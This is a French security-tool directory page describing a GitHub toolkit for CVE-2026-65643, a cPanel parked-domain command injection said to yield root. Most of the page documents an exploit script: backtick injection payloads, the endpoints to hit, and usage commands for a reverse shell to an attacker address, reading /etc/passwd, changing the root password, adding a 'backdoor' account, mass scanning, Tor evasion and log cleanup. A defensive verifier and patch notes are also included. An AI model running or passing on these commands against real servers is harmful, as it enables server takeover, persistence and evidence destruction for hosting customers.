Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-65643-PoC-Toolkit — Boîte à outils Red/Blue team pour CVE-2026-65643, une RCE de stationnement de domaine cPanel. Comprend un exploit avec reverse shell, webshell, persistance et scan de masse, ainsi qu'un vérificateur non intrusif pour la détection et l'audit. | Kitploit
Outils/GitHubGitHub/tc4dy/cve-2026-65643-poc-toolkit
Escalade de PrivilègesScanners de VulnérabilitésMécanismes de PersistanceExploitationExploitation d'Applications WebPost-ExploitationTests d'IntrusionCommandement et ContrôleRed Teaming

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Développement de Charges Utiles
GitHubtc4dy/cve-2026-65643-poc-toolkit

CVE-2026-65643-PoC-Toolkit

Boîte à outils Red/Blue team pour CVE-2026-65643, une RCE de stationnement de domaine cPanel. Comprend un exploit avec reverse shell, webshell, persistance et scan de masse, ainsi qu'un vérificateur non intrusif pour la détection et l'audit.

Voir le dépôt
il y a 1 jourPas encore vérifié

CVEPoC

CVE‑2026‑65643 – Kit de détection d'exécution de code à distance (RCE) pour le domaine parking de cPanel

Python 3.8+ CVSS Author cPanel

⚠️ UTILISATION ÉTHIQUE UNIQUEMENT – TESTS DE SÉCURITÉ AUTORISÉS
Ce dépôt fournit des outils destinés uniquement aux professionnels de la sécurité autorisés, aux équipes bleues et aux testeurs d'intrusion.
L'accès non autorisé à des systèmes informatiques est illégal en vertu de la CFAA (États-Unis), du Computer Misuse Act (Royaume-Uni), du TCK 243/244 (Turquie) et des lois similaires dans le monde entier.


📖 Présentation de la vulnérabilité

CVE‑2026‑65643 est une vulnérabilité critique d'injection de commandes dans cPanel & WHM versions 11.x qui permet à un utilisateur cPanel authentifié d'exécuter des commandes système arbitraires avec des privilèges root via la fonctionnalité de domaine parking.

Comment cela fonctionne

  1. Accès authentifié requis – l'attaquant doit disposer d'un compte cPanel valide (nom d'utilisateur/mot de passe) sur le serveur cible.
  2. Injection dans le domaine parking – lors de l'ajout d'un domaine en parking, le nom de domaine n'est pas correctement assaini, ce qui permet à l'attaquant d'injecter des commandes shell à l'aide d'accents graves (`).
  3. Exécution de commandes – la commande injectée est exécutée par le système avec les privilèges de l'utilisateur cPanel, qui peuvent être élevés à root via des techniques d'élévation de privilèges.
  4. Privilèges root – étant donné que l'opération de domaine parking s'exécute avec des permissions suffisantes, des commandes arbitraires peuvent être exécutées avec des privilèges élevés.
  5. Impact – compromission totale du serveur, vol de données, portes dérobées, ransomwares et mouvement latéral. Mettez à jour immédiatement !

Versions affectées

  • cPanel & WHM 11.110.0.140 et antérieures – vulnérables
  • 11.134.0.52 et antérieures – vulnérables
  • 11.136.0.36 et antérieures – vulnérables
  • 11.138.0.1 et antérieures – vulnérables
  • 11.138.1.6 et ultérieures – corrigées

Correctif

  • Mettez à niveau vers cPanel & WHM 11.138.1.6, 11.138.0.2, 11.136.0.37, 11.134.0.53 ou 11.110.0.141 ou une version plus récente.
  • Si la mise à niveau n'est pas possible, désactivez les permissions de domaine parking pour les utilisateurs cPanel comme solution de contournement temporaire.

🧰 Outils

OutilObjectifUtilisateur visé
exploit.pyKit complet d'exploitation avec shell inversé, webshell, persistance, lecture/écriture de fichiers, changement de mot de passe root, scan de masse, support Tor et fonctionnalités OPSEC.

📊 Comparaison des fonctionnalités


🎯 Résumé des cas d'utilisation


⚙️ Installation

root@kitploit:~
git clone https://github.com/tc4dy/CVE-2026-65643-Toolkit
cd CVE-2026-65643-Toolkit
pip install -r requirements.txt

requirements.txt

root@kitploit:~
requests
urllib3

📋 Paramètres

Paramètres de exploit.py

Paramètres de verifier.py


💥 Scénarios


🧪 Points de terminaison et méthodes d'injection

L'exploit utilise les points de terminaison et méthodes d'injection cPanel suivants :

Format de la charge utile

root@kitploit:~
# Format de la charge utile d'injection
test.com`<commande>`

# Exemple
test.com`id`
test.com`whoami`
test.com`echo 'pwned' > /tmp/pwned`

🛡️ Utilisation responsable

  • Utilisez ces outils uniquement sur des systèmes dont vous êtes propriétaire ou pour lesquels vous disposez d'une autorisation écrite explicite de test.
  • L'accès non autorisé est illégal et contraire à l'éthique.
  • Les auteurs ne sont pas responsables de toute utilisation abusive.
  • Respectez toujours les lois et réglementations de votre pays.

Ce logiciel est fourni uniquement à des fins éducatives et pour des tests de sécurité autorisés.

Télécharger l’outil
Équipes rouges / testeurs d'intrusion autorisés
verifier.pyVérificateur de vulnérabilité non intrusif qui détecte la version de cPanel, valide l'injection et évalue le risque sans exécuter de charge utile malveillante. Génère des rapports détaillés.Équipes bleues / auditeurs de sécurité
Fonctionnalitéexploit.pyverifier.py
Détection de vulnérabilité✅✅
Détection de version (4 points de terminaison)✅✅
Injection de commandes✅❌
Shell inversé✅❌
Téléversement de WebShell✅❌
Persistance (création d'utilisateur cPanel)✅❌
Changement de mot de passe root✅❌
Lecture/écriture de fichiers✅❌
4 méthodes d'injection (JSON/Form/CGI/API2)✅✅
Support Tor (anonymat)✅❌
Rotation du User‑Agent (OPSEC)✅❌
Jitter (OPSEC)✅❌
Scan de masse (multi‑thread)✅❌
Shell interactif✅❌
Mode non intrusif (sûr)❌✅
Journalisation chronologique✅✅
Rapport HTML✅❌
Rapport JSON✅✅
Nettoyage des journaux (anti‑forensique)✅✅
Support proxy✅✅
User‑Agent personnalisé✅✅
Contrôle de la vérification SSL✅✅
ScénarioOutil recommandé
Équipe bleue – vérification si votre installation cPanel est vulnérableverifier.py
Audit de sécurité – évaluation de vulnérabilité non intrusiveverifier.py
Équipe rouge – tests d'intrusion autorisés avec exploitation complèteexploit.py
Bug Bounty – tests de divulgation responsableverifier.py
Scan de masse – vérification de plusieurs cibles pour détecter la vulnérabilitéexploit.py (détection uniquement)
Réponse aux incidents – vérification si les systèmes sont compromisverifier.py
ParamètreDescription
-t, --targetURL cPanel cible (par ex. https://cpanel.example.com:2083)
-l, --target-fileFichier contenant la liste des cibles (une par ligne) pour le scan de masse
-u, --usernameNom d'utilisateur cPanel
-P, --passwordMot de passe cPanel
-p, --portRemplacer le port cPanel (par défaut : celui de l'URL ou 2083)
--threadsNombre de threads pour multi‑cibles (par défaut : 10)
-o, --outputEnregistrer le rapport JSON dans un fichier
--html-reportEnregistrer le rapport HTML dans un fichier
-v, --verboseSortie détaillée
--proxyProxy HTTP/HTTPS (par ex. http://127.0.0.1:8080)
--torAcheminer via Tor (localhost:9050)
-ua, --user-agentUser‑Agent personnalisé
--no-keep-aliveNe pas maintenir la session active
--delayDélai entre les requêtes (par défaut : 2,0 s)
--jitterJitter aléatoire (0‑1 s) entre les requêtes (par défaut : 0,5)
--max-retriesNombre maximal de tentatives (par défaut : 5)
--ssl-verifyVérifier les certificats SSL
--timeoutDélai d'expiration des requêtes (par défaut : 15 s)
--cmdExécuter une seule commande sur la cible
--reverse-shellShell inversé IP:PORT
--passwdChanger le mot de passe root
--adduserCréer un utilisateur cPanel (UTILISATEUR DOMAINE MOT_DE_PASSE)
--readLire un fichier
--writeÉcrire un fichier (spécifier le chemin)
--write-contentContenu à écrire
--cleanupNettoyer les journaux et l'historique après l'exploitation
-i, --interactiveShell interactif après l'exploitation
--domain-suffixSuffixe pour le domaine en parking (par défaut : exploit.local)
ParamètreDescription
-t, --targetURL cPanel cible (par ex. https://cpanel.example.com:2083)
-u, --usernameNom d'utilisateur cPanel
-P, --passwordMot de passe cPanel
-o, --outputEnregistrer le rapport JSON dans un fichier
-v, --verboseSortie détaillée
--proxyProxy HTTP/HTTPS (par ex. http://127.0.0.1:8080)
--torAcheminer via Tor (localhost:9050)
--ssl-verifyVérifier les certificats SSL
--timeoutDélai d'expiration des requêtes (par défaut : 15 s)
--cleanupNettoyer les journaux après le test
#ScénarioCommande
1Vérification rapide de vulnérabilitépython verifier.py -t https://cpanel.example.com:2083 -u user -P pass
2Scan détaillé avec rapportpython verifier.py -t https://cpanel.example.com:2083 -u user -P pass -o report.json -v
3Shell inversépython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --reverse-shell 192.168.1.100:4444
4Exécuter une commandepython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --cmd "whoami"
5Lire un fichier sensiblepython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --read /etc/passwd
6Changer le mot de passe rootpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --passwd NewRootPass123
7Créer un nouvel utilisateur cPanel (persistance)python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --adduser backdoor domain.com Parola123
8Shell interactif après exploitationpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass -i
9Scan de masse à partir d'un fichierpython exploit.py -l targets.txt -u user -P pass --threads 20 -o results.json
10Utiliser proxy, Tor et User‑Agent personnalisépython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --proxy http://127.0.0.1:8080 --tor -ua "Mozilla/5.0"
11Nettoyer les journaux après exploitationpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --cleanup
MéthodePoint de terminaisonDescription
API JSON/cpsessXXXXX/json-api/domainMéthode d'injection principale via charge utile JSON
Données de formulaire/cpsessXXXXX/json-api/domainInjection alternative via données encodées en formulaire
Script CGI/cgi-sys/domainpark.cgiInjection via point de terminaison CGI hérité
API2/cpsessXXXXX/json-api/cpanelMéthode d'injection API2 héritée